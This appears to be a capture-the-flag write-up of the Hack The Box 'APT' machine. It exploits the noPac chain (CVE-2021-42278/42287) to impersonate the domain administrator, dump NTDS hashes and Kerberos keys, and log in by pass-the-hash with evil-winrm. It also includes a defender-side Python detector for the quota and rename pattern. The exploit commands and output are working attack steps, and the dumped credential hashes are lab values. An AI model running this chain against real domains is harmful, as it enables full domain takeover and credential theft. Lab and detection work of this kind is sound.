CVE-2021-42278 / CVE-2021-42287


The target system is likely vulnerable to the CVE-2021-42278 + CVE-2021-42287 chain attack, given that it is relatively old and does not appear to have the patch for it installed.

By default, any domain user has the SeMachineAccountPrivilege enabled, and I have already confirmed that the henry.vinson_adm user has this privilege. Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely.

*evil-winrm* ps c:\Users\henry.vinson_adm\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
 
 
distinguishedname         : DC=htb,DC=local
ms-ds-machineaccountquota : 999
name                      : htb
objectclass               : domainDNS
objectguid                : f21d468d-12d5-4130-83ce-76336296ff48

For some reason, the ms-DS-MachineAccountQuota attribute is set to 999. It is usually 10 by default.

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache powerview 'htb.local/@apt.htb.local' -k --no-pass --dc-ip $IPv6 -q 'Get-DomainObject "DC=HTB,DC=LOCAL" -ResolveGUIDs'
[2023-10-23 19:42:51] LDAP Signing NOT Enforced!
[...REDACTED...]
 
ms-ds-machineaccountquota                       : 999
 
[...REDACTED...]

It can also be checked remotely. I used the TGT of the henry.vinson user this time to show that the exploit does not require elevating privileges to the henry.vinson_adm user. This would usually be done via ldapsearch, but I only have the TGT and NTLM hash of the henry.vinson user, so I opted for the Python implementation of PowerView instead.

Exploit (noPac)


The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller: a computer account is added (the quota permits it) and its sAMAccountName is renamed to the DC's account name without the trailing $ sign (the DC's own account is APT$; the log below shows the spoofed account set to APT), so that tickets requested in that name are resolved by the KDC to the real DC account.
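The following is an added defender-side example; it is not code from this writeup, from the noPac project or from crackmapexec. It covers the two points above: the ms-DS-MachineAccountQuota check (any non-zero value, and especially the 999 seen here, is a finding) and the rename pattern that turns a freshly created "WIN-...$" account into the DC's bare name. The AccountEvent record, its field names and the SAMPLE_EVENTS list are constructed simplifications of Windows Security events 4741 (computer account created) and 4781 (account name changed), whose real fields are named differently (for example TargetUserName, OldTargetUserName, NewTargetUserName); the account names in the sample are taken from the noPac log on this page.

```python
"""
Added example (not from the writeup or the noPac project): defender-side checks
for the noPac preconditions. Event records are constructed and simplified.
"""
from dataclasses import dataclass

# Active Directory default for ms-DS-MachineAccountQuota.
DEFAULT_MACHINE_ACCOUNT_QUOTA = 10


@dataclass(frozen=True)
class AccountEvent:
    """Simplified Security-log record (constructed field names, not the real XML)."""
    event_id: int       # 4741 = computer account created, 4781 = account renamed
    subject: str        # account that performed the change
    target: str         # created name (4741) or old name (4781)
    new_name: str = ""  # new sAMAccountName, 4781 only


def assess_quota(quota: int) -> list[str]:
    """Return findings for an ms-DS-MachineAccountQuota value read from the domain object."""
    findings = []
    if quota > 0:
        findings.append(
            f"ms-DS-MachineAccountQuota={quota}: every authenticated user can "
            "join computer accounts; set it to 0 and delegate joins explicitly"
        )
    if quota > DEFAULT_MACHINE_ACCOUNT_QUOTA:
        findings.append(f"quota raised above the default of {DEFAULT_MACHINE_ACCOUNT_QUOTA}")
    return findings


def computer_names_missing_dollar(sam_names: list[str]) -> list[str]:
    """Computer accounts whose sAMAccountName lacks the trailing $ (the CVE-2021-42278 shape)."""
    return [n for n in sam_names if not n.endswith("$")]


def correlate_nopac(events, dc_accounts: list[str]) -> list[dict]:
    """
    Flag a 4781 rename whose new name equals a DC sAMAccountName minus its $,
    and note whether the same subject created that computer account (4741) earlier.
    """
    dc_bare = {name.rstrip("$").upper() for name in dc_accounts}
    created_by: dict[str, str] = {}
    alerts = []
    for ev in events:
        if ev.event_id == 4741:
            created_by[ev.target.upper()] = ev.subject
        elif ev.event_id == 4781 and ev.new_name.upper() in dc_bare:
            creator = created_by.get(ev.target.upper())
            alerts.append({
                "subject": ev.subject,
                "computer": ev.target,
                "impersonates": ev.new_name + "$",
                "created_by_same_subject": creator == ev.subject,
            })
    return alerts


# Constructed sample reproducing the create / rename / rename-back sequence
# visible in the noPac log on this page.
SAMPLE_EVENTS = [
    AccountEvent(4741, "HTB\\henry.vinson", "WIN-AHV3WFOKV6D$"),
    AccountEvent(4781, "HTB\\henry.vinson", "WIN-AHV3WFOKV6D$", "APT"),
    AccountEvent(4781, "HTB\\henry.vinson", "APT", "WIN-AHV3WFOKV6D$"),
]
DOMAIN_CONTROLLERS = ["APT$"]

if __name__ == "__main__":
    for line in assess_quota(999):
        print("[!]", line)
    for alert in correlate_nopac(SAMPLE_EVENTS, DOMAIN_CONTROLLERS):
        print("[!] possible noPac rename:", alert)
```

The rename back to the original name is deliberately not flagged: only a rename whose new value collides with a DC account name matters, and the creator match tells the analyst whether a single low-privileged account performed the whole sequence.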

Testing


┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d htb.local -u henry.vinson -h 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M nopac
smb         apt.htb.local   445    apt              [*] windows server 2016 standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
smb         apt.htb.local   445    apt              [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb 
NOPAC       apt.htb.local   445    APT              TGT with PAC size 1362
NOPAC       apt.htb.local   445    APT              TGT without PAC size 613
NOPAC       apt.htb.local   445    APT              
NOPAC       apt.htb.local   445    APT              VULNEABLE
nopac       apt.htb.local   445    apt              next step: https://github.com/Ridter/noPac

crackmapexec has a module for testing the noPac exploit, shown above. As the result shows, the target system is confirmed to be vulnerable.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/apt/noPac]
└─$ KRB5CCNAME=../smb/hashdump/henry.vinson@apt.htb.local.ccache python3 noPac.py htb.local/henry.vinson@apt.htb.local -no-pass -k -dc-host apt -dc-ip $IPv6 --impersonate administrator -dump 
 
███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 999
[*] Selected Target APT.htb.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-AHV3WFOKV6D$"
[*] MachineAccount "WIN-AHV3WFOKV6D$" password = IojC$7fx8*&u
[*] Successfully added machine account WIN-AHV3WFOKV6D$ with password IojC$7fx8*&u.
[*] WIN-AHV3WFOKV6D$ object = CN=WIN-AHV3WFOKV6D,CN=Computers,DC=htb,DC=local
[*] WIN-AHV3WFOKV6D$ sAMAccountName == APT
[*] Saving a DC's ticket in APT.ccache
[*] Reseting the machine account to WIN-AHV3WFOKV6D$
[*] Restored WIN-AHV3WFOKV6D$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_APT.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-AHV3WFOKV6D$
[-] Delete computer WIN-AHV3WFOKV6D$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x549bec76bf3424e0dd358da484de7268
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:738f00ed06dc528fd7ebb7a010e50849:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
henry.vinson:1105:aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb:::
henry.vinson_adm:1106:aad3b435b51404eeaad3b435b51404ee:4cd0db9103ee1cf87834760a34856fef:::
APT$:1001:aad3b435b51404eeaad3b435b51404ee:d167c3238864b12f5f82feae86a7f798:::
WIN-AHV3WFOKV6D$:5602:aad3b435b51404eeaad3b435b51404ee:265efdaf00baf55bf25ee267e93d6f70:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
krbtgt:aes256-cts-hmac-sha1-96:b63635342a6d3dce76fcbca203f92da46be6cdd99c67eb233d0aaaaaa40914bb
krbtgt:aes128-cts-hmac-sha1-96:7735d98abc187848119416e08936799b
krbtgt:des-cbc-md5:f8c26238c2d976bf
henry.vinson:aes256-cts-hmac-sha1-96:63b23a7fd3df2f0add1e62ef85ea4c6c8dc79bb8d6a430ab3a1ef6994d1a99e2
henry.vinson:aes128-cts-hmac-sha1-96:0a55e9f5b1f7f28aef9b7792124af9af
henry.vinson:des-cbc-md5:73b6f71cae264fad
henry.vinson_adm:aes256-cts-hmac-sha1-96:f2299c6484e5af8e8c81777eaece865d54a499a2446ba2792c1089407425c3f4
henry.vinson_adm:aes128-cts-hmac-sha1-96:3d70c66c8a8635bdf70edf2f6062165b
henry.vinson_adm:des-cbc-md5:5df8682c8c07a179
APT$:aes256-cts-hmac-sha1-96:4c318c89595e1e3f2c608f3df56a091ecedc220be7b263f7269c412325930454
APT$:aes128-cts-hmac-sha1-96:bf1c1795c63ab278384f2ee1169872d9
APT$:des-cbc-md5:76c45245f104a4bf
WIN-AHV3WFOKV6D$:aes256-cts-hmac-sha1-96:bf094ce831f62ec70e126462cc7e0e0dd5cdeef55a072ecf5f32c044668b4206
WIN-AHV3WFOKV6D$:aes128-cts-hmac-sha1-96:9fa9d90f862474560bab1dd36d71e8bd
WIN-AHV3WFOKV6D$:des-cbc-md5:702a0dc23264c116
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise

Shell Drop


The built-in -shell flag is not available because the C$ share is not present, so I opted for evil-winrm instead.

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ evil-winrm -i apt.htb.local -u administrator -H 'c370bddf384a691d811ff3495e8a72e2'
                                        
Evil-WinRM shell v3.5
                                        
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\Administrator\Documents> whoami
htb\administrator
*evil-winrm* ps c:\Users\Administrator\Documents> hostname
apt
*evil-winrm* ps c:\Users\Administrator\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::240
   ipv6 address. . . . . . . . . . . : dead:beef::44d8:93c7:dd88:c522
   ipv6 address. . . . . . . . . . . : dead:beef::b885:d62a:d679:573f
   link-local ipv6 address . . . . . : fe80::44d8:93c7:dd88:c522%5
   ipv4 address. . . . . . . . . . . : 10.10.10.213
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:feb9:d784%5
                                       10.10.10.2

System Level Compromise